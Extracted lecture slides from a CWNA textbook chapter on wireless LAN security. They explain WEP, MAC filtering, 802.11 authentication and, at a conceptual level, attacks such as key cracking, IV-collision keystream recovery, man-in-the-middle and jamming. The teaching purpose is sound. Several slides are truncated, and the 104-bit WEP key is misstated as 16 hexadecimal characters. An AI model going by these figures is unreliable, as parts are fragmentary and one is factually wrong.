• Define information security • Explain the basic security protections for IEEE 802.11 WLANs • List the vulnerabilities of the IEEE 802.11 standard • Describe the types of wireless attac
Trang 1CWNA Guide to Wireless LANs, Second Edition
Chapter Eight
Wireless LAN Security and Vulnerabilities
Trang 2• Define information security
• Explain the basic security protections for IEEE
802.11 WLANs
• List the vulnerabilities of the IEEE 802.11 standard
• Describe the types of wireless attacks that can be launched against a wireless network
Trang 3Security Principles: What is
Information Security?
• Information security: Task of guarding digital
information
– Ensures protective measures properly implemented
– Protects confidentiality, integrity, and availability
(CIA) on the devices that store, manipulate, and
transmit the information through products, people, and procedures
Trang 4Security Principles: What is Information Security? (continued)
Trang 5Security Principles: Challenges of
– Faster detection of weaknesses
• Day zero attacks
– Distributed attacks
• The “many against one” approach
• Impossible to stop attack by trying to identify and block source
Trang 6Security Principles: Categories of
Trang 7Security Principles: Categories of
Attackers (continued)
Table 8-1: Attacker profiles
Trang 8Security Principles: Security
Organizations
• Many security organizations exist to provide
security information, assistance, and training
– Computer Emergency Response Team Coordination Center (CERT/CC)
– Forum of Incident Response and Security Teams
(FIRST)
– InfraGard
– Information Systems Security Association (ISSA)
– National Security Institute (NSI)
– SysAdmin, Audit, Network, Security (SANS) Institute
Trang 9Basic IEEE 802.11 Security
Trang 10Access Control
• Intended to guard availability of information
• Wireless access control: Limit user’s admission to
AP
– Filtering
• Media Access Control (MAC) address filtering:
Based on a node’s unique MAC address
Trang 11Access Control (continued)
Figure 8-4: MAC address filtering
Trang 12Access Control (continued)
• MAC address filtering considered to be a basic means of controlling access
– Requires pre-approved authentication
– Difficult to provide temporary access for “guest” devices
Trang 13Wired Equivalent Privacy (WEP)
• Guard the confidentiality of information
– Ensure only authorized parties can view it
• Used in IEEE 802.11 to encrypt wireless
transmissions
– “Scrambling”
Trang 14WEP: Cryptography
• Cryptography: Science of transforming
information so that it is secure while being
transmitted or stored
– scrambles” data
• Encryption: Transforming plaintext to ciphertext
• Decryption: Transforming ciphertext to plaintext
• Cipher: An encryption algorithm
– Given a key that is used to encrypt and decrypt
messages
– Weak keys: Keys that are easily discovered
Trang 15WEP: Cryptography (continued)
Figure 8-5: Cryptography
Trang 16– Same key installed on device and AP
– Private key cryptography or symmetric
encryption
Trang 17WEP: Implementation (continued)
Figure 8-6: Symmetric encryption
Trang 18WEP: Implementation (continued)
• WEP shared secret keys must be at least 40 bits
– Most vendors use 104 bits
• Options for creating WEP keys:
– 40-bit WEP shared secret key (5 ASCII characters or
10 hexadecimal characters)
– 104-bit WEP shared secret key (13 ASCII characters
or 16 hexadecimal characters)
– Passphrase (16 ASCII characters)
• APs and wireless devices can store up to four
shared secret keys
– Default key used for all encryption
Trang 19WEP: Implementation (continued)
Figure 8-8: Default WEP keys
Trang 20WEP: Implementation (continued)
Figure 8-9: WEP encryption process
Trang 21WEP: Implementation (continued)
• When encrypted frame arrives at destination:
– Receiving device separates IV from ciphertext
– Combines IV with appropriate secret key
• Create a keystream
– Keystream used to extract text and ICV
– Text run through CRC
• Ensure ICVs match and nothing lost in transmission
• Generating keystream using the PRNG is based on
the RC4 cipher algorithm
– Stream Cipher
Trang 22WEP: Implementation (continued)
Figure 8-10: Stream cipher
Trang 23• IEEE 802.11 authentication: Process in which AP
accepts or rejects a wireless device
• Open system authentication:
– Wireless device sends association request frame to AP
• Carries info about supported data rates and service set identifier (SSID)
– AP compares received SSID with the network SSID
• If they match, wireless device authenticated
Trang 24Authentication (continued)
• Shared key authentication: Uses WEP keys
– AP sends the wireless device the challenge text
– Wireless device encrypts challenge text with its WEP key and returns it to the AP
– AP decrypts returned result and compares to original challenge text
• If they match, device accepted into network
Trang 25Vulnerabilities of IEEE 802.11 Security
• IEEE 802.11 standard’s security mechanisms for wireless networks have fallen short of their goal
• Vulnerabilities exist in:
– Authentication
– Address filtering
– WEP
Trang 26Open System Authentication
Vulnerabilities
• Inherently weak
– Based only on match of SSIDs
– SSID beaconed from AP during passive scanning
• Easy to discover
• Vulnerabilities:
– Beaconing SSID is default mode in all APs
– Not all APs allow beaconing to be turned off
• Or manufacturer recommends against it
– SSID initially transmitted in plaintext (unencrypted)
Trang 27Open System Authentication Vulnerabilities (continued)
Trang 28Open System Authentication Vulnerabilities (continued)
Figure 8-12: Forcing the renegotiation process
Trang 29Shared Secret Key Authentication
Vulnerabilities
• Attackers can view key on an approved wireless device (i.e., steal it), and then use on own wireless devices
• Brute force attack: Attacker attempts to create
every possible key combination until correct key found
• Dictionary attack: Takes each word from a
dictionary and encodes it in same way as
passphrase
– Compare encoded dictionary words against
encrypted frame
Trang 30Shared Secret Key Authentication
Vulnerabilities (continued)
• AP sends challenge text in plaintext
– Attacker can capture challenge text and device’s response (encrypted text and IV)
• Mathematically derive keystream
Trang 31Shared Secret Key Authentication
Vulnerabilities (continued)
Table 8-2: Authentication attacks
Trang 32Address Filtering Vulnerabilities
Table 8-3: MAC address attacks
Trang 33WEP Vulnerabilities
• Uses 40 or 104 bit keys
– Shorter keys easier to crack
• WEP implementation violates cardinal rule of cryptography
– Creates detectable pattern for attackers
– APs end up repeating IVs
• Collision: Two packets derived from same IV
– Attacker can use info from collisions to initiate a
keystream attack
Trang 34WEP Vulnerabilities (continued)
Figure 8-13: XOR operations
Trang 35WEP Vulnerabilities (continued)
Figure 8-14: Capturing packets
Trang 36WEP Vulnerabilities (continued)
• PRNG does not create true random number
– Pseudorandom
– First 256 bytes of the RC4 cipher can be determined
by bytes in the key itself
Table 8-4: WEP attacks
Trang 37Other Wireless Attacks:
Man-in-the-Middle Attack
• Makes it seem that two computers are
communicating with each other
– Actually sending and receiving data with computer between them
– Active or passive
Figure 8-15: Intercepting transmissions
Trang 38Other Wireless Attacks:
Man-in-the-Middle Attack (continued)
Figure 8-16: Wireless man-in-the-middle attack
Trang 39Other Wireless Attacks: Denial of
Service (DoS) Attack
• Standard DoS attack attempts to make a server or other network device unavailable by flooding it with requests
– Attacking computers programmed to request, but not respond
• Wireless DoS attacks are different:
– Jamming: Prevents wireless devices from
transmitting
– Forcing a device to continually dissociate and
re-associate with AP
Trang 40• Information security protects the confidentiality,
integrity, and availability of information on the
devices that store, manipulate, and transmit the
information through products, people, and
procedures
• Significant challenges in keeping wireless networks and devices secure
• Six categories of attackers: Hackers, crackers,
script kiddies, computer spies, employees, and
cyberterrorists
Trang 41Summary (continued)
• Three categories of default wireless protection:
access control, wired equivalent privacy (WEP), and authentication
• Significant security vulnerabilities exist in the IEEE 802.11 security mechanisms
• Man-in-the-middle attacks and denial of service
attacks (DoS) can be used to attack wireless
networks